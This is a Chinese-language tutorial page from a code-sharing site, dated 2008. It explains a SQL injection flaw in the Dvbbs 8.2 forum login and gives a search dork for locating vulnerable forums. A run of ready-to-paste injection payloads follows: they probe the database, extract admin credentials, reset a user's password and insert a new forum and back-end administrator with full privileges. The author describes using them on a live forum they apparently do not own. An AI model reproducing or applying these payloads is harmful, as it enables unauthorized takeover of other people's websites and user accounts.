当前位置: 代码网 > 服务器>网络安全>企业安全 > 教你两句话 动网8.20的后台被拿下

教你两句话 动网8.20的后台被拿下

2008年10月08日 企业安全 我要评论
教你两句话 动网8.20的后台被拿下 dvbbs8.2漏洞补下载地址:http://bbs.dvbbs.net/dispbbs.asp?boardid=8&;Id=1519564 紧急安全补丁0530 dvbbs8.2漏洞的产生login.asp 这个文件的97行Function Dvbbs_C... 08-10-08
dvbbs8.2漏洞补下载地址: http://bbs.dvbbs.net/dispbbs.asp?boardid=8&;id=1519564 紧急安全补丁0530
dvbbs8.2漏洞的产生 login.asp 这个文件的97行function dvbbs_chklogin 开始有以下代码: username=trim(dvbbs.checkstr(request("username"))) 而passport和username是用户输入的。 public function checkstr(str)
if isnull(str) then
checkstr = ""
exit function
end if
str = replace(str,chr(0),"")
checkstr = replace(str,"'","''")
end function 动网用checkstr进行处理。 当我们输入111',request("username")是111' dvbbs.checkstr(request("passport"))以后还是111'
if ajaxpro then username = unescape(username) username就变成了111' 所以,【'】符号并没有过滤掉,漏洞就产生了。
------------------------------------------------
搜索:powered by dvbbs version 8.2.0 有很多用存在这样漏洞的bbs
对于新手,分析过程比较复杂,特别是语句的组合,看了我的这个教程,基本上在一分钟之内就可以搞定.
admin' and '1'='1 用户名或者密码不正确.
admin' and '1'='2 本论坛不存在该用户名.
判断数据库类型:
;and (select count(*) from sysobjects)>0
;and (select count(*) from msysobjects)>0 admin' and 1=(select count(*) from dv_admin where left(username,1)='a') and '1'='1 admin' and 1=(select count(*) from dv_admin where left(password,1)='a') and '1'='1 ' and (select @@version)>0-- ' and (select is_srvrolemember('sysadmin'))>0--
' and (select is_member('db_owner'))>0-- 49ba59abbe56e057=123456
';update dv_user set password='49ba59abbe56e057' where username='sishui'-- ';update dv_user set usergroupid=1 where username='sishui'-- bugtest';insert into dv_user (username,userpassword,usergroupid) values('sishui','49ba59abbe56e057','1')-- bugtest';insert into dv_admin (username,password,flag,adduser) values('sishui','49ba59abbe56e057','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45','sishui')-- 为了省时间我就直接先找了个论坛测试,大家看操作就好,我们来到登陆页面,这句话的意思就是在这个论坛里加入一个管理拥护, 我拥护名为sishui 密码为123456 密码是加密的, 我们来看看 下面的密码随便输入 ,这个意思就是代表成功了,我们来登陆看看,看见了吧, 呵呵, 我们在来进后台不成功, 为什么呢, 应为刚刚我加入的是论坛管理, 没有提到后台管理,下面我们在来用代码,提到后台管理权限,我们来看代码 意思就是把他的权限全部提升到45 ,我们来试试,好了,我们在登陆看,我们进来了,呵呵,。 好了就这样,教程结束
(0)

相关文章:

  • 破解数据库下载漏洞

    破解数据库下载漏洞

    破解数据库下载漏洞 作为脚本漏洞的头号杀手锏——数据库下载漏洞,现在已经被越来越多的人所熟知。在这个信息化技术更新飞快的时代,漏洞产生... [阅读全文]
  • 用ASP脚本命令重启服务器

    用ASP脚本命令重启服务器

    用ASP脚本命令重启服务器 家知道直接使用ASP是不能够重启服务器的,这时我们需要制作一个组件来实现功能,ASP通过这个组件调用系统API,然后按照不同的重启... [阅读全文]
  • 教你注入下载文件的代码到IE进程然后下载的文件

    教你注入下载文件的代码到IE进程然后下载的文件

    教你注入下载文件的代码到IE进程然后下载的文件 大家可能都用过网页木马来下真正的EXE木马吧,但是有些时候 后门比较大下载的时候常常是网页暂停或是报错(CHM... [阅读全文]
  • 后门程序技术知识深解

    后门程序技术知识深解

    后门程序技术知识深解 后门程序又称特洛伊木马,其用途在于潜伏在电脑中,从事搜集信息或便于黑客进入的动作。后程序和电脑病毒最大的差别,在于后门程序不一定有自我复... [阅读全文]
  • 教你成为ASP木马高手

    教你成为ASP木马高手

    教你成为ASP木马高手 1.名称:如何制作图片ASP木马 (可显示图片) 建一个asp文件,内容为<!--#i nclude file="at... [阅读全文]
  • DNS欺骗技术教程

    DNS欺骗技术教程

    DNS欺骗技术教程 定义: DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。原理:如果可以冒充域名服务器,然后把查询的IP地址设为攻击者的IP地址,这样的话... [阅读全文]

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com